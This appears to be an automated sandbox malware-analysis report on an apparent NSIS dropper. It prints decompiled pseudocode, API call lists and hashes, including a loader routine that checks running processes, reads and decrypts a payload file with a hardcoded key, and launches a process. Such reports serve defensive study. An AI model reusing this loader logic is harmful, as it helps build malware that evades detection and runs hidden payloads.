				_v54 = 0x64;
				_v53 = 0x36;
				_v52 = 0x31;
				_v51 = 0x37;
				_v50 = 0x32;
				_v49 = 0x38;
				_v48 = 0x39;
				_v47 = 0x64;
				_v46 = 0x38;
				_v45 = 0x39;
				_v44 = 0x34;
				_v43 = 0x35;
				_v42 = 0x63;
				_v41 = 0x32;
				_v40 = 0x39;
				_v39 = 0x39;
				_v38 = 0x62;
				_v37 = 0x31;
				_v36 = 0x64;
				_v35 = 0x62;
				_v34 = 0x35;
				_v33 = 0x33;
				_v32 = 0x65;
				_v31 = 0x36;
				_v30 = 0x66;
				_v29 = 0x33;
				_v28 = 0x35;
				_v27 = 0x64;
				_v26 = 0x30;
				_v25 = 0x35;
				_v24 = 0;
				_v16 = _v16 & 0x00000000;
				_v116 = _v116 & 0x00000000;
				_v12 = _v12 & 0x00000000;
				_v8 = E722F458C();
				_v60 = E722F4634(_v8, 0x34cf0bf);
				_v64 = E722F4634(_v8, 0x55e38b1f);
				_v68 = E722F4634(_v8, 0xd1775dc4);
				_v120 = E722F4634(_v8, 0xd6eb2188);
				_v96 = E722F4634(_v8, 0xa2eae210);
				_v124 = E722F4634(_v8, 0xcd8538b2);
				_v72 = E722F4634(_v8, 0x8a111d91);
				_v76 = E722F4634(_v8, 0x170c1ca1);
				_v80 = E722F4634(_v8, 0xa5f15738);
				_v88 = E722F4634(_v8, 0x433a3842);
				_v92 = E722F4634(_v8, 0x2ffe2c64);
				_v112 = 0x2d734193;
				_v108 = 0x63daa681;
				_v104 = 0x26090612;
				_v100 = 0x6f28fae0;
				_t124 = 4;
				_t126 = E722F4225(_t159,  *((intOrPtr*)(_t158 + _t124 * 0 - 0x6c))); // executed
				_t160 = _t126;
				if(_t126 != 0) {
					L4:
					_v60(0x7918);
					L5:
					_v68(0,  &_v1248, 0x103);
					_t130 = CreateFileW(_a4, 0x80000000, 7, 0, 3, 0x80, 0);
					_v20 = _t130;
					if(_v20 != 0xffffffff) {
						_t131 = _v76(_v20, 0);
						_v16 = _t131;
						__eflags = _v16 - 0xffffffff;
						if(_v16 != 0xffffffff) {
							_t132 = VirtualAlloc(0, _v16, 0x3000, 4);
							_v12 = _t132;
							__eflags = _v12;
							if(_v12 != 0) {
								_t134 = ReadFile(_v20, _v12, _v16,  &_v84, 0);
								__eflags = _t134;
								if(_t134 != 0) {
									_t99 =  &_v56; // 0x37
									E722F4029(_v12, _t99, 0x20);
									_t137 = E722F3034(_t156, _t157, __eflags, _v12); // executed
									__eflags = _t137;
									if(_t137 != 0) {
										_v60(0xbb8);
										E722F3005(_t156,  &_v140, 0x10);
										E722F3005(_t156,  &_v208, 0x44);
										_t137 = _v96( &_v1248, _v92(0, 0, 0, 0x20, 0, 0,  &_v208,  &_v140));
										__eflags = _t137;
										if(_t137 != 0) {
											_t137 = _v64(0);
										}
									}
									ExitProcess(0);
								}
								return _t134;
							}
							return _t132;
						}
						return _t131;
					}
					return _t130;
				}
				_t147 = 4;
				_t149 = E722F4225(_t160,  *((intOrPtr*)(_t158 + (_t147 << 0) - 0x6c))); // executed
				_t161 = _t149;
				if(_t149 != 0) {
					goto L4;
				}
				_t150 = 4;
				_t152 = E722F4225(_t161,  *((intOrPtr*)(_t158 + (_t150 << 1) - 0x6c))); // executed
				_t162 = _t152;
				if(_t152 != 0) {
					goto L4;
				}
				_t153 = 4;
				_t155 = E722F4225(_t162,  *((intOrPtr*)(_t158 + _t153 * 3 - 0x6c))); // executed
				if(_t155 == 0) {
					goto L5;
				}
				goto L4;
			}













































































                                                                                                                                                                                                          0x722f42c8
                                                                                                                                                                                                          0x722f42c8
                                                                                                                                                                                                          0x722f42c8
                                                                                                                                                                                                          0x722f42d1
                                                                                                                                                                                                          0x722f42d5
                                                                                                                                                                                                          0x722f42d9
                                                                                                                                                                                                          0x722f42dd
                                                                                                                                                                                                          0x722f42e1
                                                                                                                                                                                                          0x722f42e5
                                                                                                                                                                                                          0x722f42e9
                                                                                                                                                                                                          0x722f42ed
                                                                                                                                                                                                          0x722f42f1
                                                                                                                                                                                                          0x722f42f5
                                                                                                                                                                                                          0x722f42f9
                                                                                                                                                                                                          0x722f42fd
                                                                                                                                                                                                          0x722f4301
                                                                                                                                                                                                          0x722f4305
                                                                                                                                                                                                          0x722f4309
                                                                                                                                                                                                          0x722f430d
                                                                                                                                                                                                          0x722f4311
                                                                                                                                                                                                          0x722f4315
                                                                                                                                                                                                          0x722f4319
                                                                                                                                                                                                          0x722f431d
                                                                                                                                                                                                          0x722f4321
                                                                                                                                                                                                          0x722f4325
                                                                                                                                                                                                          0x722f4329
                                                                                                                                                                                                          0x722f432d
                                                                                                                                                                                                          0x722f4331
                                                                                                                                                                                                          0x722f4335
                                                                                                                                                                                                          0x722f4339
                                                                                                                                                                                                          0x722f433d
                                                                                                                                                                                                          0x722f4341
                                                                                                                                                                                                          0x722f4345
                                                                                                                                                                                                          0x722f4349
                                                                                                                                                                                                          0x722f434d
                                                                                                                                                                                                          0x722f4351
                                                                                                                                                                                                          0x722f4355
                                                                                                                                                                                                          0x722f4359
                                                                                                                                                                                                          0x722f435d
                                                                                                                                                                                                          0x722f4361
                                                                                                                                                                                                          0x722f4365
                                                                                                                                                                                                          0x722f436e
                                                                                                                                                                                                          0x722f437e
                                                                                                                                                                                                          0x722f438e
                                                                                                                                                                                                          0x722f439e
                                                                                                                                                                                                          0x722f43ae
                                                                                                                                                                                                          0x722f43be
                                                                                                                                                                                                          0x722f43ce
                                                                                                                                                                                                          0x722f43de
                                                                                                                                                                                                          0x722f43ee
                                                                                                                                                                                                          0x722f43fe
                                                                                                                                                                                                          0x722f440e
                                                                                                                                                                                                          0x722f441e
                                                                                                                                                                                                          0x722f4421
                                                                                                                                                                                                          0x722f4428
                                                                                                                                                                                                          0x722f442f
                                                                                                                                                                                                          0x722f4436
                                                                                                                                                                                                          0x722f443f
                                                                                                                                                                                                          0x722f4447
                                                                                                                                                                                                          0x722f444c
                                                                                                                                                                                                          0x722f444e
                                                                                                                                                                                                          0x722f4488
                                                                                                                                                                                                          0x722f448d
                                                                                                                                                                                                          0x722f4490
                                                                                                                                                                                                          0x722f449e
                                                                                                                                                                                                          0x722f44b6
                                                                                                                                                                                                          0x722f44b9
                                                                                                                                                                                                          0x722f44c0
                                                                                                                                                                                                          0x722f44cc
                                                                                                                                                                                                          0x722f44cf
                                                                                                                                                                                                          0x722f44d2
                                                                                                                                                                                                          0x722f44d6
                                                                                                                                                                                                          0x722f44e9
                                                                                                                                                                                                          0x722f44ec
                                                                                                                                                                                                          0x722f44ef
                                                                                                                                                                                                          0x722f44f3
                                                                                                                                                                                                          0x722f4509
                                                                                                                                                                                                          0x722f450c
                                                                                                                                                                                                          0x722f450e
                                                                                                                                                                                                          0x722f4514
                                                                                                                                                                                                          0x722f451b
                                                                                                                                                                                                          0x722f4523
                                                                                                                                                                                                          0x722f4528
                                                                                                                                                                                                          0x722f452a
                                                                                                                                                                                                          0x722f4531
                                                                                                                                                                                                          0x722f453d
                                                                                                                                                                                                          0x722f454b
                                                                                                                                                                                                          0x722f4575
                                                                                                                                                                                                          0x722f4578
                                                                                                                                                                                                          0x722f457a
                                                                                                                                                                                                          0x722f457e
                                                                                                                                                                                                          0x722f457e
                                                                                                                                                                                                          0x722f457a
                                                                                                                                                                                                          0x722f4583
                                                                                                                                                                                                          0x722f4583
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x722f450e
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x722f44f3
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x722f44d6
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x722f44c0
                                                                                                                                                                                                          0x722f4452
                                                                                                                                                                                                          0x722f445a
                                                                                                                                                                                                          0x722f445f
                                                                                                                                                                                                          0x722f4461
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x722f4465
                                                                                                                                                                                                          0x722f446c
                                                                                                                                                                                                          0x722f4471
                                                                                                                                                                                                          0x722f4473
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x722f4477
                                                                                                                                                                                                          0x722f447f
                                                                                                                                                                                                          0x722f4486
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00000000

                                                                                                                                                                                                          APIs
                                                                                                                                                                                                            • Part of subcall function 722F4225: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,?,873D1860,?,5C7BF6E9,?,EA31D3B6), ref: 722F426A
                                                                                                                                                                                                          • CreateFileW.KERNELBASE(00000000,80000000,00000007,00000000,00000003,00000080,00000000), ref: 722F44B6
                                                                                                                                                                                                            • Part of subcall function 722F4225: Process32FirstW.KERNEL32(000000FF,0000022C), ref: 722F428E
                                                                                                                                                                                                          • VirtualAlloc.KERNELBASE(00000000,000000FF,00003000,00000004), ref: 722F44E9
                                                                                                                                                                                                            • Part of subcall function 722F4225: Process32NextW.KERNEL32(000000FF,0000022C), ref: 722F42B9
                                                                                                                                                                                                          • ReadFile.KERNELBASE(000000FF,00000000,000000FF,00000000,00000000), ref: 722F4509
                                                                                                                                                                                                          • ExitProcess.KERNELBASE(00000000), ref: 722F4583
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000004.00000002.2167863165.00000000722F3000.00000040.00020000.sdmp, Offset: 722F0000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000004.00000002.2167849303.00000000722F0000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                          • Associated: 00000004.00000002.2167854070.00000000722F1000.00000080.00020000.sdmp Download File
                                                                                                                                                                                                          • Associated: 00000004.00000002.2167858720.00000000722F2000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                          • Associated: 00000004.00000002.2167867973.00000000722F5000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: CreateFileProcess32$AllocExitFirstNextProcessReadSnapshotToolhelp32Virtual
                                                                                                                                                                                                          • String ID: 73d617289d8945c299b1db53e6f35d05
                                                                                                                                                                                                          • API String ID: 1567874941-3630458439
                                                                                                                                                                                                          • Opcode ID: 1ce232aee319d8676acfab2c485de6f04bfdb48fbf44c22f5e161f8e2b8913af
                                                                                                                                                                                                          • Instruction ID: 4ccc116b33998a6850569abc872e0b4ce8aaa148c81d190d08f864e0b05156d1
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 1ce232aee319d8676acfab2c485de6f04bfdb48fbf44c22f5e161f8e2b8913af
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 35912670D04389EEEF129BE8CC09BEDFEB9AF14305F10406AE650BA2D5C7B54A55CB25
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          Function 00405E15, Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 33COMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          C-Code - Quality: 100%
                                                                                                                                                                                                          			E00405E15(char _a4, intOrPtr _a6, CHAR* _a8) {
				char _t11;
				signed int _t12;
				int _t15;
				signed int _t17;
				void* _t20;
				CHAR* _t21;

				_t21 = _a4;
				_t20 = 0x64;
				while(1) {
					_t11 =  *0x40a3ec; // 0x61736e
					_t20 = _t20 - 1;
					_a4 = _t11;
					_t12 = GetTickCount();
					_t17 = 0x1a;
					_a6 = _a6 + _t12 % _t17;
					_t15 = GetTempFileNameA(_a8,  &_a4, 0, _t21); // executed
					if(_t15 != 0) {
						break;
					}
					if(_t20 != 0) {
						continue;
					}
					 *_t21 =  *_t21 & 0x00000000;
					return _t15;
				}
				return _t21;
			}









                                                                                                                                                                                                          0x00405e19
                                                                                                                                                                                                          0x00405e1f
                                                                                                                                                                                                          0x00405e20
                                                                                                                                                                                                          0x00405e20
                                                                                                                                                                                                          0x00405e25
                                                                                                                                                                                                          0x00405e26
                                                                                                                                                                                                          0x00405e29
                                                                                                                                                                                                          0x00405e33
                                                                                                                                                                                                          0x00405e40
                                                                                                                                                                                                          0x00405e43
                                                                                                                                                                                                          0x00405e4b
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00405e4f
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00405e51
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00405e51
                                                                                                                                                                                                          0x00000000

                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • GetTickCount.KERNEL32(76712754,C:\Users\user\AppData\Local\Temp\,"C:\Users\Public\vbc.exe" ,00403484,1033,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403698,?,00000007,00000009,0000000B), ref: 00405E29
                                                                                                                                                                                                          • GetTempFileNameA.KERNEL32(?,?,00000000,?), ref: 00405E43
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000004.00000002.2165562026.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000004.00000002.2165547451.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                          • Associated: 00000004.00000002.2165572222.0000000000408000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                          • Associated: 00000004.00000002.2165581608.000000000040A000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                          • Associated: 00000004.00000002.2165607422.000000000041D000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                          • Associated: 00000004.00000002.2165615181.000000000042C000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                          • Associated: 00000004.00000002.2165621749.0000000000435000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                          • Associated: 00000004.00000002.2165630933.0000000000438000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: CountFileNameTempTick
                                                                                                                                                                                                          • String ID: "C:\Users\Public\vbc.exe" $C:\Users\user\AppData\Local\Temp\$nsa
                                                                                                                                                                                                          • API String ID: 1716503409-1498418707
                                                                                                                                                                                                          • Opcode ID: 6f67c72f8a62f6904c1c8d13d4c39cdc389fdf02a571d79ef00f96109094c4c4
                                                                                                                                                                                                          • Instruction ID: 94097d04b6c38ee8b1870d6a931f35239ed30ef0cd20ec9d97f11959184772c3
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 6f67c72f8a62f6904c1c8d13d4c39cdc389fdf02a571d79ef00f96109094c4c4
                                                                                                                                                                                                          • Instruction Fuzzy Hash: E4F0A7363442087BDB109F55EC44B9B7B9DDF91750F14C03BF984DA1C0D6B0D9988798
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          Function 72E316DB, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 120COMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          C-Code - Quality: 94%
                                                                                                                                                                                                          			E72E316DB(void* __edx, void* __edi, void* __esi, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20) {
				void _v36;
				char _v88;
				struct HINSTANCE__* _t37;
				intOrPtr _t42;
				void* _t48;
				void* _t49;
				void* _t50;
				void* _t54;
				intOrPtr _t57;
				signed int _t61;
				signed int _t63;
				void* _t67;
				void* _t68;
				void* _t72;
				void* _t76;

				_t76 = __esi;
				_t68 = __edi;
				_t67 = __edx;
				 *0x72e3405c = _a8;
				 *0x72e34060 = _a16;
				 *0x72e34064 = _a12;
				 *((intOrPtr*)(_a20 + 0xc))( *0x72e34038, E72E31556);
				_push(1); // executed
				_t37 = E72E31A98(); // executed
				_t54 = _t37;
				if(_t54 == 0) {
					L28:
					return _t37;
				} else {
					if( *((intOrPtr*)(_t54 + 4)) != 1) {
						E72E322AF(_t54);
					}
					E72E322F1(_t67, _t54);
					_t57 =  *((intOrPtr*)(_t54 + 4));
					if(_t57 == 0xffffffff) {
						L14:
						if(( *(_t54 + 0x810) & 0x00000004) == 0) {
							if( *((intOrPtr*)(_t54 + 4)) == 0) {
								_t37 = E72E324D8(_t54);
							} else {
								_push(_t76);
								_push(_t68);
								_t61 = 8;
								_t13 = _t54 + 0x818; // 0x818
								memcpy( &_v36, _t13, _t61 << 2);
								_t42 = E72E3156B(_t54,  &_v88);
								 *(_t54 + 0x834) =  *(_t54 + 0x834) & 0x00000000;
								_t18 = _t54 + 0x818; // 0x818
								_t72 = _t18;
								 *((intOrPtr*)(_t54 + 0x820)) = _t42;
								 *_t72 = 3;
								E72E324D8(_t54);
								_t63 = 8;
								_t37 = memcpy(_t72,  &_v36, _t63 << 2);
							}
						} else {
							E72E324D8(_t54);
							_t37 = GlobalFree(E72E31266(E72E31559(_t54)));
						}
						if( *((intOrPtr*)(_t54 + 4)) != 1) {
							_t37 = E72E3249E(_t54);
							if(( *(_t54 + 0x810) & 0x00000040) != 0 &&  *_t54 == 1) {
								_t37 =  *(_t54 + 0x808);
								if(_t37 != 0) {
									_t37 = FreeLibrary(_t37);
								}
							}
							if(( *(_t54 + 0x810) & 0x00000020) != 0) {
								_t37 = E72E314E2( *0x72e34058);
							}
						}
						if(( *(_t54 + 0x810) & 0x00000002) != 0) {
							goto L28;
						} else {
							return GlobalFree(_t54);
						}
					}
					_t48 =  *_t54;
					if(_t48 == 0) {
						if(_t57 != 1) {
							goto L14;
						}
						E72E32CC3(_t54);
						L12:
						_t54 = _t48;
						L13:
						goto L14;
					}
					_t49 = _t48 - 1;
					if(_t49 == 0) {
						L8:
						_t48 = E72E32A38(_t57, _t54); // executed
						goto L12;
					}
					_t50 = _t49 - 1;
					if(_t50 == 0) {
						E72E326B2(_t54);
						goto L13;
					}
					if(_t50 != 1) {
						goto L14;
					}
					goto L8;
				}
			}


















                                                                                                                                                                                                          0x72e316db
                                                                                                                                                                                                          0x72e316db
                                                                                                                                                                                                          0x72e316db
                                                                                                                                                                                                          0x72e316e5
                                                                                                                                                                                                          0x72e316ed
                                                                                                                                                                                                          0x72e316fa
                                                                                                                                                                                                          0x72e31708
                                                                                                                                                                                                          0x72e3170b
                                                                                                                                                                                                          0x72e3170d
                                                                                                                                                                                                          0x72e31712
                                                                                                                                                                                                          0x72e31717
                                                                                                                                                                                                          0x72e31836
                                                                                                                                                                                                          0x72e31836
                                                                                                                                                                                                          0x72e3171d
                                                                                                                                                                                                          0x72e31721
                                                                                                                                                                                                          0x72e31724
                                                                                                                                                                                                          0x72e31729
                                                                                                                                                                                                          0x72e3172b
                                                                                                                                                                                                          0x72e31731
                                                                                                                                                                                                          0x72e31737
                                                                                                                                                                                                          0x72e31767
                                                                                                                                                                                                          0x72e3176e
                                                                                                                                                                                                          0x72e31792
                                                                                                                                                                                                          0x72e317dd
                                                                                                                                                                                                          0x72e31794
                                                                                                                                                                                                          0x72e31794
                                                                                                                                                                                                          0x72e31795
                                                                                                                                                                                                          0x72e3179b
                                                                                                                                                                                                          0x72e3179c
                                                                                                                                                                                                          0x72e317a6
                                                                                                                                                                                                          0x72e317a9
                                                                                                                                                                                                          0x72e317ae
                                                                                                                                                                                                          0x72e317b5
                                                                                                                                                                                                          0x72e317b5
                                                                                                                                                                                                          0x72e317bc
                                                                                                                                                                                                          0x72e317c2
                                                                                                                                                                                                          0x72e317c8
                                                                                                                                                                                                          0x72e317d5
                                                                                                                                                                                                          0x72e317d6
                                                                                                                                                                                                          0x72e317d9
                                                                                                                                                                                                          0x72e31770
                                                                                                                                                                                                          0x72e31771
                                                                                                                                                                                                          0x72e31786
                                                                                                                                                                                                          0x72e31786
                                                                                                                                                                                                          0x72e317e7
                                                                                                                                                                                                          0x72e317ea
                                                                                                                                                                                                          0x72e317f7
                                                                                                                                                                                                          0x72e317fe
                                                                                                                                                                                                          0x72e31806
                                                                                                                                                                                                          0x72e31809
                                                                                                                                                                                                          0x72e31809
                                                                                                                                                                                                          0x72e31806
                                                                                                                                                                                                          0x72e31816
                                                                                                                                                                                                          0x72e3181e
                                                                                                                                                                                                          0x72e31823
                                                                                                                                                                                                          0x72e31816
                                                                                                                                                                                                          0x72e3182b
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x72e3182d
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x72e3182e
                                                                                                                                                                                                          0x72e3182b
                                                                                                                                                                                                          0x72e3173b
                                                                                                                                                                                                          0x72e3173e
                                                                                                                                                                                                          0x72e3175c
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x72e3175f
                                                                                                                                                                                                          0x72e31764
                                                                                                                                                                                                          0x72e31764
                                                                                                                                                                                                          0x72e31766
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x72e31766
                                                                                                                                                                                                          0x72e31740
                                                                                                                                                                                                          0x72e31741
                                                                                                                                                                                                          0x72e31749
                                                                                                                                                                                                          0x72e3174a
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x72e3174a
                                                                                                                                                                                                          0x72e31743
                                                                                                                                                                                                          0x72e31744
                                                                                                                                                                                                          0x72e31752
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x72e31752
                                                                                                                                                                                                          0x72e31747
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x72e31747

                                                                                                                                                                                                          APIs
                                                                                                                                                                                                            • Part of subcall function 72E31A98: GlobalFree.KERNEL32(?), ref: 72E31D09
                                                                                                                                                                                                            • Part of subcall function 72E31A98: GlobalFree.KERNEL32(?), ref: 72E31D0E
                                                                                                                                                                                                            • Part of subcall function 72E31A98: GlobalFree.KERNEL32(?), ref: 72E31D13
                                                                                                                                                                                                          • GlobalFree.KERNEL32(00000000), ref: 72E31786
                                                                                                                                                                                                          • FreeLibrary.KERNEL32(?), ref: 72E31809
                                                                                                                                                                                                          • GlobalFree.KERNEL32(00000000), ref: 72E3182E
                                                                                                                                                                                                            • Part of subcall function 72E322AF: GlobalAlloc.KERNEL32(00000040,?), ref: 72E322E0
                                                                                                                                                                                                            • Part of subcall function 72E326B2: GlobalAlloc.KERNEL32(00000040,00000000,?,?,00000000,?,?,?,72E31757,00000000), ref: 72E32782
                                                                                                                                                                                                            • Part of subcall function 72E3156B: wsprintfA.USER32 ref: 72E31599
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000004.00000002.2167878164.0000000072E31000.00000020.00020000.sdmp, Offset: 72E30000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000004.00000002.2167873253.0000000072E30000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                          • Associated: 00000004.00000002.2167884351.0000000072E33000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                          • Associated: 00000004.00000002.2167889901.0000000072E35000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: Global$Free$Alloc$Librarywsprintf
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 3962662361-3916222277
                                                                                                                                                                                                          • Opcode ID: eb57688421203f75bb5ac725ae1a95dc25ec1022b82c243420d072c4bfb2377c
                                                                                                                                                                                                          • Instruction ID: 925cabda9b176cae10d6345814888c1ee023eee2b32c23b923873970724ab8a5
                                                                                                                                                                                                          • Opcode Fuzzy Hash: eb57688421203f75bb5ac725ae1a95dc25ec1022b82c243420d072c4bfb2377c
                                                                                                                                                                                                          • Instruction Fuzzy Hash: E2415E765012089BCB039B6CDD84B9D3BACBF0531BF98E46DE9479E087DB748485CBA1
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          Function 004032BF, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 101COMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          C-Code - Quality: 93%
                                                                                                                                                                                                          			E004032BF(intOrPtr _a4) {
				intOrPtr _t11;
				signed int _t12;
				void* _t15;
				long _t16;
				void* _t18;
				intOrPtr _t30;
				intOrPtr _t33;
				intOrPtr _t35;
				void* _t36;
				intOrPtr _t48;

				_t33 =  *0x429464 -  *0x40b898 + _a4;
				 *0x42f450 = GetTickCount() + 0x1f4;
				if(_t33 <= 0) {
					L22:
					E00402E52(1);
					return 0;
				}
				E0040343E( *0x429474);
				SetFilePointer( *0x40a01c,  *0x40b898, 0, 0); // executed
				 *0x429470 = _t33;
				 *0x429460 = 0;
				while(1) {
					_t30 = 0x4000;
					_t11 =  *0x429468 -  *0x429474;
					if(_t11 <= 0x4000) {
						_t30 = _t11;
					}
					_t12 = E00403428(0x41d460, _t30);
					if(_t12 == 0) {
						break;
					}
					 *0x429474 =  *0x429474 + _t30;
					 *0x40b8a0 = 0x41d460;
					 *0x40b8a4 = _t30;
					L6:
					L6:
					if( *0x42f454 != 0 &&  *0x42f500 == 0) {
						 *0x429460 =  *0x429470 -  *0x429464 - _a4 +  *0x40b898;
						E00402E52(0);
					}
					 *0x40b8a8 = 0x415460;
					 *0x40b8ac = 0x8000;
					if(E0040677B(0x40b8a0) < 0) {
						goto L20;
					}
					_t35 =  *0x40b8a8; // 0x415f10
					_t36 = _t35 - 0x415460;
					if(_t36 == 0) {
						__eflags =  *0x40b8a4; // 0x0
						if(__eflags != 0) {
							goto L20;
						}
						__eflags = _t30;
						if(_t30 == 0) {
							goto L20;
						}
						L16:
						_t16 =  *0x429464;
						if(_t16 -  *0x40b898 + _a4 > 0) {
							continue;
						}
						SetFilePointer( *0x40a01c, _t16, 0, 0);
						goto L22;
					}
					_t18 = E00405E8D( *0x40a01c, 0x415460, _t36); // executed
					if(_t18 == 0) {
						_push(0xfffffffe);
						L21:
						_pop(_t15);
						return _t15;
					}
					 *0x40b898 =  *0x40b898 + _t36;
					_t48 =  *0x40b8a4; // 0x0
					if(_t48 != 0) {
						goto L6;
					}
					goto L16;
					L20:
					_push(0xfffffffd);
					goto L21;
				}
				return _t12 | 0xffffffff;
			}













                                                                                                                                                                                                          0x004032cf
                                                                                                                                                                                                          0x004032e2
                                                                                                                                                                                                          0x004032e7
                                                                                                                                                                                                          0x00403417
                                                                                                                                                                                                          0x00403419
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x0040341f
                                                                                                                                                                                                          0x004032f3
                                                                                                                                                                                                          0x00403306
                                                                                                                                                                                                          0x0040330c
                                                                                                                                                                                                          0x00403312
                                                                                                                                                                                                          0x0040331d
                                                                                                                                                                                                          0x00403322
                                                                                                                                                                                                          0x00403327
                                                                                                                                                                                                          0x0040332f
                                                                                                                                                                                                          0x00403331
                                                                                                                                                                                                          0x00403331
                                                                                                                                                                                                          0x0040333a
                                                                                                                                                                                                          0x00403341
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00403347
                                                                                                                                                                                                          0x0040334d
                                                                                                                                                                                                          0x00403353
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00403359
                                                                                                                                                                                                          0x0040335f
                                                                                                                                                                                                          0x0040337f
                                                                                                                                                                                                          0x00403384
                                                                                                                                                                                                          0x00403389
                                                                                                                                                                                                          0x0040338f
                                                                                                                                                                                                          0x00403395
                                                                                                                                                                                                          0x004033a6
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x004033a8
                                                                                                                                                                                                          0x004033ae
                                                                                                                                                                                                          0x004033b0
                                                                                                                                                                                                          0x004033d3
                                                                                                                                                                                                          0x004033d9
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x004033db
                                                                                                                                                                                                          0x004033dd
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x004033df
                                                                                                                                                                                                          0x004033df
                                                                                                                                                                                                          0x004033f2
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00403401
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00403401
                                                                                                                                                                                                          0x004033ba
                                                                                                                                                                                                          0x004033c1
                                                                                                                                                                                                          0x0040340e
                                                                                                                                                                                                          0x00403414
                                                                                                                                                                                                          0x00403414
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00403414
                                                                                                                                                                                                          0x004033c3
                                                                                                                                                                                                          0x004033c9
                                                                                                                                                                                                          0x004033cf
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00403412
                                                                                                                                                                                                          0x00403412
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00403412
                                                                                                                                                                                                          0x00000000

                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • GetTickCount.KERNEL32(00000008,00000000,?,00000000,004031E9,00000004,00000000,00000000,?,?,00403165,000000FF,00000000,00000000,0040A130,?), ref: 004032D3
                                                                                                                                                                                                            • Part of subcall function 0040343E: SetFilePointer.KERNELBASE(00000000,00000000,00000000,0040313E,?), ref: 0040344C
                                                                                                                                                                                                          • SetFilePointer.KERNELBASE(00000000,00000000,?,00000000,004031E9,00000004,00000000,00000000,?,?,00403165,000000FF,00000000,00000000,0040A130,?), ref: 00403306
